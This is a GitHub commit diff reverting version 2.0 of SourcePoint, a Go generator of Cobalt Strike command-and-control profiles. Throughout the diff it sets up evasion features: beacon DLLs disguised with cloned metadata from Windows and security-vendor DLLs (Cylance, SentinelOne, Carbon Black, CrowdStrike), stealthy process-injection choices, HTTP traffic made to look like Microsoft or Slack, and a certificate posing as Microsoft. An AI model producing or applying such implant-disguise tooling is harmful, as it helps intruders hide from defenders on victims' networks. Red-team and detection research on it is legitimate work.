Revert "v2.0"

This reverts commit 28ffed0.
Tylous · Oct 6, 2021 · 62f2052 · 62f2052
1 parent 2252ce4
commit 62f2052
Show file tree

Hide file tree

Showing 5 changed files with 41 additions and 185 deletions.
diff --git a/Loader/Loader.go b/Loader/Loader.go
@@ -85,15 +85,12 @@ func GenerateOptions(stage, sleeptime, jitter, useragent, uri, customuri, beacon
 	Process_Inject.Variables = GenerateProcessInject(processinject_min_alloc, injector)
 	Beacon_GETPOST_Profile.Variables, Beacon_SSL.Variables = GenerateProfile(Profile, CDN, CDN_Value, cert_password, custom_cert, ProfilePath, Host)
 	fmt.Println("[*] Building Profile...")
+
 	Build(custom_cert, cert_password, outFile, Beacon_Com, Beacon_Stage_p1, Beacon_Stage_p2, Beacon_Stage_p3, Process_Inject, Beacon_PostEX, Beacon_GETPOST, Beacon_GETPOST_Profile, Beacon_SSL)
 	fmt.Println(HostStageMessage)
-	PE := strings.Split(Beacon_Stage_p2.Variables["pe"], `;`)
-	PE_Name := strings.Split(PE[5], `"`)
-	fmt.Println("[*] Beacon DLL spoffed To: " + PE_Name[1])
 	PEX := strings.Split(Beacon_PostEX.Variables["Post_EX_Process_Name"], `sysnative\\`)
 	PEX_Name := PEX[1]
-	fmt.Println("[*] Post-Ex process name: " + PEX_Name[:(len(PEX_Name)-3)])
-	fmt.Println("[!] Beacon shellcode will obfuscate beacon in memory prior to sleeping")
+	fmt.Println("[*] Post-Ex Process Name: " + PEX_Name[:(len(PEX_Name)-3)])
 	Name, _ := strconv.Atoi(Profile)
 	fmt.Println("[*] Seleted Profile: " + Struct.Profile_Names[Name])
 	fmt.Println("[+] Profile Generated: " + outFile)
@@ -251,9 +248,6 @@ func GenerateHTTPVaribles(Host, metadata, uri, customuri, CDN, CDN_Value, Profil
 	Beacon_GETPOST.Variables["maxage"] = Utils.GenerateNumer(172800, 31536001)
 	Beacon_GETPOST.Variables["Age"] = Utils.GenerateNumer(1222, 2500)
 
-	Beacon_GETPOST.Variables["UValue"] = Utils.GenerateValue(6, 15)
-	Beacon_GETPOST.Variables["CSMValue"] = Utils.GenerateValue(6, 15)
-
 	if Forwarder == true {
 		Beacon_GETPOST.Variables["forward"] = "true"
 	} else {
@@ -267,13 +261,13 @@ func GeneratePE(beacon_PE string) map[string]string {
 	Beacon_Stage_p2 := &Beacon_Stage_p2{}
 	Beacon_Stage_p2.Variables = make(map[string]string)
 	if beacon_PE == "" {
-		PE_Num, _ := strconv.Atoi(Utils.GenerateNumer(0, 30))
+		PE_Num, _ := strconv.Atoi(Utils.GenerateNumer(0, 25))
 		Beacon_Stage_p2.Variables["pe"] = Struct.Peclone_list[PE_Num]
 	}
 	if beacon_PE != "" {
 		PE_Num, _ := strconv.Atoi(beacon_PE)
-		if PE_Num >= 30 {
-			log.Fatal("Error: Please provide a valid PE number less the 31 option")
+		if PE_Num >= 27 {
+			log.Fatal("Error: Please provide a valid PE number less the 26 option")
 		}
 		Beacon_Stage_p2.Variables["pe"] = Struct.Peclone_list[(PE_Num - 1)]
 	}
@@ -336,7 +330,7 @@ func GenerateProfile(Profile, CDN, CDN_Value, cert_password, custom_cert, Profil
 			Beacon_SSL.Variables["Cert"] = Struct.Cert[4]
 			Beacon_GETPOST_Profile.Variables["Profile"] = Struct.HTTP_GET_POST_list[(num_Profile - 1)]
 
-		} else if num_Profile == 5 || num_Profile == 7 {
+		} else if num_Profile == 5 {
 			if cert_password == "" {
 				log.Fatal("Error: Please provide a Password value to use this profile")
 			}
@@ -345,7 +339,7 @@ func GenerateProfile(Profile, CDN, CDN_Value, cert_password, custom_cert, Profil
 			}
 			Beacon_SSL.Variables["Cert"] = Struct.Cert[4]
 			Beacon_GETPOST_Profile.Variables["Profile"] = Struct.HTTP_GET_POST_list[(num_Profile - 1)]
-		} else if num_Profile == 8 {
+		} else if num_Profile == 7 {
 			if cert_password == "" {
 				log.Fatal("Error: Please provide a Password value to use this profile")
 			}

diff --git a/README.md b/README.md
@@ -8,10 +8,6 @@ SourcePoint is a polymorphic C2 profile generator for Cobalt Strike C2s, written
 <p align="center"> <img src=Screenshots/C2int_p1.png width="900" height="710" border="2px solid #555">
 <p align="center"> <img src=Screenshots/C2int_p2.png width="900" height="480" border="2px solid #555">
 
-```
-go install github.com/Tylous/SourcePoint
-```
-
 
 ## Installation
 ```
@@ -44,14 +40,12 @@ Usage of ./SourcePoint:
         The base URI for custom HTTP GET/POST profile (default "0")
   -Datajitter string
         Appends a value to HTTP-Get and HTTP-Post server output (default "50")
-  -Forwarder
-        Enabled the X-forwarded-For header (Good for when your C2 is behind a redirector)
   -Host string
         Team server domain name
   -Injector string
-        Select the preferred method to allocate memory in The remote process:
+        Select the preferred method to allocate memory in the remote process:
         [*] VirtualAllocEx (Great for cross architecture i.e x86 -> x64 and x64->x86)
-        [*] NtMapViewOfSection (A more steathly option however fails over to VirtualAllocEx generating more events when it does)
+        [*] NtMapViewOfSection (A more stealthly option, however fails over to VirtualAllocEx, generating more events when it does)
   -Jitter string
         Jitter percentage for beacon call home
   -Keylogger string
@@ -96,14 +90,10 @@ Usage of ./SourcePoint:
         [24] wow64.dll
         [25] wow64win.dll
         [26] WWANSVC.dll
-        [27] CyMemDef64.dll (Cylance's DLL)
-        [28] InProcessClient.dll (SentinelOne's DLL)
-        [29] ctiuser.dll (Carbon Black's DLL)
-        [30] umppc.dll (CrowdStrike's DLL)
   -Password string
         SSL certificate password
   -PostEX_Name string
-        File Post-Ex activties will spawn and inject into (Use the number):
+        File Post-Ex activities will spawn and inject into (Use the number):
         [1] WerFault.exe
         [2] WWAHost.exe
         [3] wlanext.exe
@@ -128,16 +118,15 @@ Usage of ./SourcePoint:
         [2] Slack
         [3] Gotomeeting
         [4] Outlook.Live
-        [5] Safebrowsing [Cloudfront Compatible]
-        [6] AzureEdge [AzureEdge Compatible]
-        [7] Field-Keyword [Cloudfront Compatible]
-        [8] Custom (Used with ProfilePath)
+        [5] Cloudfront
+        [6] AzureEdge
+        [7] Custom (Used with ProfilePath)
   -ProfilePath string
         Path of custom HTTP GET/POST profile...
   -Sleep string
-        Inital beacon sleep time
+        Initial beacon sleep time
   -Stage string
-        Disable host staging (Default: False) (default "false")
+        Disable host staging (Default: False) (default "False")
   -Uri string
         The number URIs a profile for beacons to choose from
   -Useragent string
@@ -216,7 +205,7 @@ Currently SourcePoint provides you with 6 baked in options for HTTP/HTTPS traffi
 * Gotomeeting's Active Meeting Communication 
 * Microsoft Outlook's Email Communication
 
-2 of the profile options (5, 6 and 7) are designed specifically for:
+2 of the profile options (5 and 6) are designed specifically for:
 * Cloudfront.net
 * AzureEdge.net
 
@@ -254,7 +243,6 @@ Customuri:
 CDN:
 CDN_Value: 
 ProfilePath: 
-Forwarder: False
 ```
 
 

diff --git a/SourcePoint.go b/SourcePoint.go
@@ -118,11 +118,7 @@ func options() *FlagOptions {
 [23] winsqlite3.dll
 [24] wow64.dll
 [25] wow64win.dll
-[26] WWANSVC.dll
-[27] CyMemDef64.dll (Cylance's DLL)
-[28] InProcessClient.dll (SentinelOne's DLL)
-[29] ctiuser.dll (Carbon Black's DLL)
-[30] umppc.dll (CrowdStrike's DLL)`)
+[26] WWANSVC.dll`)
 	processinject_min_alloc := flag.String("Allocation", "", "Minimum amount of memory to request for injected content (must be higher than 4096)")
 	Post_EX_Process_Name := flag.String("PostEX_Name", "", `File Post-Ex activties will spawn and inject into (Use the number):
 [1] WerFault.exe
@@ -148,10 +144,9 @@ func options() *FlagOptions {
 [2] Slack
 [3] Gotomeeting
 [4] Outlook.Live
-[5] Safebrowsing [Cloudfront Compatible]
-[6] AzureEdge [AzureEdge Compatible]
-[7] Field-Keyword [Cloudfront Compatible]
-[8] Custom (Used with ProfilePath)`)
+[5] Cloudfront
+[6] AzureEdge
+[7] Custom (Used with ProfilePath)`)
 	ProfilePath := flag.String("ProfilePath", "", "Path of custom HTTP GET/POST profile...")
 	metadata := flag.String("Metadata", "base64url", `Specifies how to transform and embed metadata into the HTTP request:
 [*] base64

diff --git a/Struct/Struct.go b/Struct/Struct.go
@@ -6,10 +6,10 @@ var Profile_Names = []string{
 	`Slack`,
 	`Gotomeeting`,
 	`Outlook.Live`,
-	`Safebrowsing`,
+	`Cloudfront`,
 	`AzureEdge`,
-	`Field-Keyword`,
-	`Custom`}
+	`Custom
+`}
 
 var Post_EX_Process_Name = []string{`
 	set spawnto_x86 "%windir%\\syswow64\\WerFault.exe";
@@ -317,40 +317,7 @@ var Peclone_list = []string{`
 	set image_size_x64 "1785856";
 	set name           "WWANSVC.DLL";
 	set rich_header    "\x77\xf3\x15\x7d\x33\x92\x7b\x2e\x33\x92\x7b\x2e\x33\x92\x7b\x2e\x3a\xea\xe8\x2e\xb3\x92\x7b\x2e\x68\xfa\x7f\x2f\x3c\x92\x7b\x2e\x68\xfa\x78\x2f\x30\x92\x7b\x2e\x68\xfa\x7e\x2f\x2d\x92\x7b\x2e\x33\x92\x7a\x2e\xf8\x97\x7b\x2e\x68\xfa\x7a\x2f\x3e\x92\x7b\x2e\x68\xfa\x7b\x2f\x32\x92\x7b\x2e\x68\xfa\x72\x2f\xa9\x92\x7b\x2e\x68\xfa\x86\x2e\x32\x92\x7b\x2e\x68\xfa\x84\x2e\x32\x92\x7b\x2e\x68\xfa\x79\x2f\x32\x92\x7b\x2e\x52\x69\x63\x68\x33\x92\x7b\x2e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
-	`,
-	`
-	set checksum       "164653";
-	set compile_time   "06 Nov 2020 18:42:28";
-	set entry_point    "63072";
-	set name           "CyMemDef64.dll";
-	set rich_header    "\x5f\x64\xdb\xae\x1b\x05\xb5\xfd\x1b\x05\xb5\xfd\x1b\x05\xb5\xfd\x1b\x05\xb4\xfd\x30\x05\xb5\xfd\xe7\x72\x0c\xfd\x18\x05\xb5\xfd\x7d\xeb\x66\xfd\x07\x05\xb5\xfd\x3c\xc3\x78\xfd\x1a\x05\xb5\xfd\x7d\xeb\x7f\xfd\x1a\x05\xb5\xfd\x3c\xc3\x7c\xfd\x1a\x05\xb5\xfd\x1b\x05\x22\xfd\x1a\x05\xb5\xfd\x7d\xeb\x79\xfd\x1a\x05\xb5\xfd\x52\x69\x63\x68\x1b\x05\xb5\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
-	`,
-	`
-	set checksum       "1968945";
-	set compile_time   "26 Jul 2021 18:09:30";
-	set entry_point    "1099888";
-	set image_size_x86 "2072576";
-	set image_size_x64 "2072576";
-	set name           "InProcessClient.dll";
-	set rich_header    "\xd5\x71\x0e\xb3\x91\x10\x60\xe0\x91\x10\x60\xe0\x91\x10\x60\xe0\x85\x7b\x63\xe1\x84\x10\x60\xe0\x85\x7b\x65\xe1\x24\x10\x60\xe0\x48\x64\x64\xe1\x83\x10\x60\xe0\x48\x64\x63\xe1\x9d\x10\x60\xe0\xf7\x7f\x9d\xe0\x92\x10\x60\xe0\x4a\x64\x61\xe1\x93\x10\x60\xe0\x85\x7b\x64\xe1\xb2\x10\x60\xe0\x85\x7b\x61\xe1\x94\x10\x60\xe0\x48\x64\x65\xe1\x0e\x10\x60\xe0\xfb\x78\x65\xe1\x80\x10\x60\xe0\x85\x7b\x66\xe1\x93\x10\x60\xe0\x91\x10\x61\xe0\x5c\x11\x60\xe0\x4a\x64\x69\xe1\x03\x10\x60\xe0\x4a\x64\x63\xe1\x93\x10\x60\xe0\x4a\x64\x60\xe1\x90\x10\x60\xe0\x4a\x64\x9f\xe0\x90\x10\x60\xe0\x91\x10\xf7\xe0\x90\x10\x60\xe0\x4a\x64\x62\xe1\x90\x10\x60\xe0\x52\x69\x63\x68\x91\x10\x60\xe0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
-    `,
-	`
-	set checksum       "2817694";
-	set compile_time   "19 May 2021 13:31:53";
-	set entry_point    "1253200";
-	set image_size_x86 "2863104";
-	set image_size_x64 "2863104";
-	set name           "ctiuser.dll";
-	set rich_header    "\x15\xd9\xb0\x30\x51\xb8\xde\x63\x51\xb8\xde\x63\x51\xb8\xde\x63\x45\xd3\xda\x62\x47\xb8\xde\x63\x45\xd3\xdd\x62\x5f\xb8\xde\x63\x45\xd3\xdb\x62\x90\xb8\xde\x63\xcf\x18\x19\x63\x52\xb8\xde\x63\xa9\xc8\xda\x62\x40\xb8\xde\x63\xa9\xc8\xdd\x62\x5b\xb8\xde\x63\xa9\xc8\xdb\x62\xdf\xb8\xde\x63\x45\xd3\xdf\x62\x54\xb8\xde\x63\x45\xd3\xd8\x62\x53\xb8\xde\x63\x51\xb8\xdf\x63\x29\xb9\xde\x63\xe9\xc9\xda\x62\x69\xb8\xde\x63\xe9\xc9\xdb\x62\x13\xb8\xde\x63\xe9\xc9\xde\x62\x50\xb8\xde\x63\xe9\xc9\x21\x63\x50\xb8\xde\x63\x51\xb8\x49\x63\x50\xb8\xde\x63\xe9\xc9\xdc\x62\x50\xb8\xde\x63\x52\x69\x63\x68\x51\xb8\xde\x63\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
-    `,
-	`
-	set checksum       "83724";
-	set compile_time   "05 Aug 2020 16:06:20";
-	set entry_point    "5664";
-	set name           "umppc.dll";
-	set rich_header    "\xba\xf0\x63\x99\xfe\x91\x0d\xca\xfe\x91\x0d\xca\xfe\x91\x0d\xca\x92\xf9\x0e\xcb\xff\x91\x0d\xca\x92\xf9\x05\xcb\xf3\x91\x0d\xca\x9b\xf7\x0e\xcb\xfc\x91\x0d\xca\x9b\xf7\x09\xcb\xfb\x91\x0d\xca\x9b\xf7\x0c\xcb\xfd\x91\x0d\xca\xfe\x91\x0c\xca\xc6\x91\x0d\xca\x92\xf9\x0d\xcb\xff\x91\x0d\xca\x92\xf9\xf2\xca\xff\x91\x0d\xca\x92\xf9\x0f\xcb\xff\x91\x0d\xca\x52\x69\x63\x68\xfe\x91\x0d\xca\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
-	`,
-}
+	`}
 
 var Useragent_list = []string{
 	"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4242.0 Safari/537.36",
@@ -813,8 +780,8 @@ server {
 
 http-stager {
 
-set uri_x86 "/Meeting/{{.Variables.UValue}}/";
-set uri_x64 "/Meeting/{{.Variables.UValue}}/";
+set uri_x86 "/Meeting/32251817/";
+set uri_x64 "/Meeting/32251816/";
 
 client {
 	header "Host" "{{.Variables.Host}}";
@@ -830,20 +797,20 @@ server {
 
 }
 `, `
+http-get {
+
+{{.Variables.HTTP_GET_URI}}
+
 http-config {
 
 	#set "true" if teamserver is behind redirector
 	set trust_x_forwarded_for "{{.Variables.forward}}";			
 }
-http-get {
-
-{{.Variables.HTTP_GET_URI}}
-
 client {
 
 header "Host" "{{.Variables.Host}}";
 header "Accept" "*/*";
-header "Cookie" "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D910F9;MSPAuth=3EkAjDKjI;xid=730bf7;wla42={{.Variables.UValue}}";
+header "Cookie" "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D910F9;MSPAuth=3EkAjDKjI;xid=730bf7;wla42=ZG0yMzA2KjEs";
 	
 	metadata {
 		{{.Variables.metadata_mode}};
@@ -977,7 +944,7 @@ client {
 	header "Accept-Language" "en-US,en;q=0.5";
 	metadata {
 		{{.Variables.metadata_mode}};
-		prepend "REF=ID={{.Variables.UValue}}";
+		prepend "REF=ID=";
 		header "Cookie";
 	}
 }
@@ -1009,7 +976,7 @@ client {
 
 	id {
 		{{.Variables.metadata_mode}};
-		prepend "U={{.Variables.UValue}}";
+		prepend "U=193u81141";
 		prepend "REF=ID=";
 		header "Cookie";
 	}
@@ -1099,6 +1066,7 @@ server {
 }
 }
 `, `
+
 http-config {
 
 	#set "true" if teamserver is behind redirector
@@ -1116,7 +1084,7 @@ client {
 
 	metadata {
 		{{.Variables.metadata_mode}};
-		prepend "PREF=ID={{.Variables.CSMValue}}";
+		prepend "PREF=ID=";
 		header "Cookie";
 	}
 }
@@ -1147,7 +1115,7 @@ client {
 
 	id {
 		{{.Variables.metadata_mode}};
-		prepend "U={{.Variables.UValue}}";
+		prepend "U=779b64e1a7ed737a";
 		prepend "PREF=ID=";
 		header "Cookie";
 	}
@@ -1169,72 +1137,7 @@ server {
 		print;
 	}
 }
-}`,
-	`
-http-config {
-
-	#set "true" if teamserver is behind redirector
-	set trust_x_forwarded_for "{{.Variables.forward}}";			
-}
-
-http-get {
-
-
-    {{.Variables.HTTP_GET_URI}}
-
-    client {
-
-        header "Accept" "*/*";
-
-        metadata {
-            {{.Variables.metadata_mode}};;
-            prepend "session-token=";
-            append "csm-hit={{.Variables.CSMValue}}";
-            header "Cookie";
-        }
-    }
-    server {
-        output {
-                print;
-        }
-}
-}
-
-http-post {
-
-    {{.Variables.HTTP_POST_URI}}
-
-    client {
-
-        header "Accept" "*/*";
-        header "Content-Type" "text/xml";
-        header "X-Requested-With" "XMLHttpRequest";
-
-        id {
-                {{.Variables.metadata_mode}};;
-                prepend "U={{.Variables.UValue}}";
-                prepend "REF=ID=";
-                header "Cookie";
-        }
-
-        output {
-                print;
-        }
-}
-
-    server {
-
-        header "Server" "Server";
-        header "X-Frame-Options" "SAMEORIGIN";
-        header "x-ua-compatible" "IE=edge";
-
-        output {
-            print;
-        }
-    }
-}
-`,
-}
+}`}
 
 var Cert = []string{`
 set O        "Microsoft Corporation"; #Organization Name